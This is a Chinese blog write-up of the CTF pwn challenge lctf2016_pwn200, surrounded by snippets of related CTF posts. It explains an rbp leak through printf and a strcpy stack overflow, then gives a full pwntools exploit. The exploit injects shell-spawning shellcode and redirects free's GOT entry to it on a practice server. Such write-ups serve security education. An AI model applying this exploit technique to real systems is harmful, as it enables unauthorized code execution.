lctf2016_pwn200【write up】

于 2023-04-14 23:36:30 发布
阅读量112 收藏 1
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130164027
版权

lctf2016_pwn200

惯例我们先来checksec一下

啥都没开 考虑手写shellcode执行

请添加图片描述

放进ida64里看看

main函数没啥含金量我们这里就不放了 只是set_buf后call vuln函数

vuln函数中存在我们的第一个泄漏点0x30的长度足够我们写入shellcode 同时当我们把v2填满时 printf会帮我们泄露出rbp中存储的main_rbp的值

请添加图片描述

当我们此处写入数字是就会正常返回执行sub400_a29

请添加图片描述

第二个漏洞点在这里

此处的strcpy函数存在栈溢出漏洞

请添加图片描述

那么我们的思路就很清晰了

先将shellcode写入栈上然后将栈填满进而利用printf函数泄露出我们main_rbp利用main_rbp我们可以通过计算便宜的到我们的shellcode_addr 然后我们利用sub400_a29中的漏洞将shellcode_addr填入buf中然后将dest覆盖为free_got的地址

exp:

from pwn import *
io=remote('node4.buuoj.cn',28550)
#io=process('./pwn200')
elf=ELF('./pwn200')
free_got=elf.got['free']
context.log_level='debug'
context.arch='amd64'

shellcode = asm(shellcraft.sh()).ljust(0x30,'a')
io.sendafter('u?\n',shellcode)

main_rbp= u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
shellcode_addr=main_rbp-0x50
io.recvuntil('id ~~?')
io.sendline('1')
io.recvuntil('money~')
payload=p64(shellcode_addr)+'a'*0x30+p64(free_got)
io.sendline(payload)
io.recvuntil('choice :')
io.sendline('2')
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn200
weixin_44007796的博客
02-12 299
pwn200 wp 一.了解一下rop 攻击前提: 存在栈溢出且可以控制返回地址 存在满足条件的gadget,如果开启PLE保护则要想办法泄露gadget的地址 二.解题开始 1.先用gdb调试,查看保护机制 2.用IDA 分析,发现read函数存在栈溢出,0x68的buf硬生生写入了0x100 3,用pattern确定偏移量 先150来生成一段150个字节的字符串,r后输入它,再用pat...
pwn-200(xctf)
weixin_43868725的博客
08-08 610
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2191
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1717
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 415
做题记录
LCTF_2018_Platform:LCTF 2018平台
05-04
LCTF 2018 platformLCTF 2018 比赛平台。本项目中前端代码为webpack打包后的前端代码,前端源码参见。部署项目使用nginx+uwsgi+django部署,示例的和都已上传。uwsgi配置文件中为控制权限使用nginx:nginx用户启动,...
LCTF2017-WEB-LPLAYGROUND:LCTF2017网站题L_PLAYGROUND
03-23
LCTF2017C L_PLAYGROUND 0x00.LCTF2017 0X01。项目介绍 这个项目是LCTF2017的网络题L_PLAYGROUND的开放原始码。 ./doc/build.md指南在./doc/build.md ./doc/writeup.md在./doc/writeup.md 0x02。参考 0x03。后记 这...
LCTF说明书VariSpec™ Liquid Crystal Tunable Filters
01-06
《VariSpec液体晶体可调滤光片用户手册》是Cambridge Research & Instrumentation, Inc.(简称CRi)于2006年10月发布的,主要针对VariSpec™液体晶体可调滤光片(LCTF)的使用进行指导。LCTF是一种在光学领域应用的...
LCTF软件备份VariSpec™ Liquid Crystal Tunable Filters
01-06
The RS232 can operate at 9600 or 19,200 baud, while the USB appears as a virtual COMx device. While it appears to be present at either 9600 baud or 115.2 kbaud , the actual data transmission occurs ...
LCTF#LCTF2017#web签到题1
07-25
web签到题题目不难, 一共就只有几个点用file协议读取本地文件截断url后面拼接的/, GET请求, 用?#都可以payload其实很简单: file://
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
pwn200,一道不完全考察ret2libc的小小pwn题
shanwei274的博客
04-08 353
pwn200 —XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。 1.获取pwn题 啪的一下就下载好了。 2.查看保护 拿到题我不做,哎,我干什么呢,我先查看保护! 裸奔题,开的东西不多,所以这里就看我们发挥了 3.ida看看 首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我
攻防世界pwn200
qq_25044201的博客
01-17 240
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
buu lctf2016_pwn200
qq_51474381的博客
04-25 287
代码分析 1.可泄露rbp(就是泄露栈地址,因为没有\x00截断时会连带输出后面的数据)。 2.buf可覆盖ptr(栈上变量覆盖),strcpy()可能会破坏我们构造好的payload,但是strcpy()并不会复制"\x00",所以在shellcode最前面要加上"\x00",这样就只有溢出,没有复制 3.后面就是堆的操作了,只有add和delete 总体思路 1.泄露rbp,获得栈地址。 2.写入shellcode+伪造size+覆盖dest,从而控制ptr。 3.free掉.
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1318
题目地址:pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
2017湖湘杯pwn200_wp_格式化字符串漏洞
aptx4869_li的博客
01-02 1596
本文是格式化字符串漏洞的利用,题目为2017年湖湘杯pwn200,题目文件 链接:https://pan.baidu.com/s/1geZAemZ 密码:b51f 0x0001 看文件类型为elf文件,用  binwalk  查看一下: 一个32位的文件,用IDA看看: main函数: sub_80485CD():
lctf2016_pwn200 堆利用
最新发布
人饭子的博客
12-31 500
lctf2016:pwn200 堆利用 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由l...
pwn学习系列--任务4 pwn200
weixin_44113469的博客
02-11 847
栈溢出之pwn200解题步骤 主要涉及到Ret2libc–修改返回地址,让其指向内存中已有的某个函数,还涉及到简单的rop( Return Oriented Programming )构造 思路分析:有read函数,变量buf大小为0x68,read可写入0x100,可知有栈溢出。题目中只给出system函数,没有给出“/bin/sh”,所以要自己通过read函数写入“/bin/sh”,然后返回调...
xdctf-pwn200
Vccxx的博客
04-08 1336
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值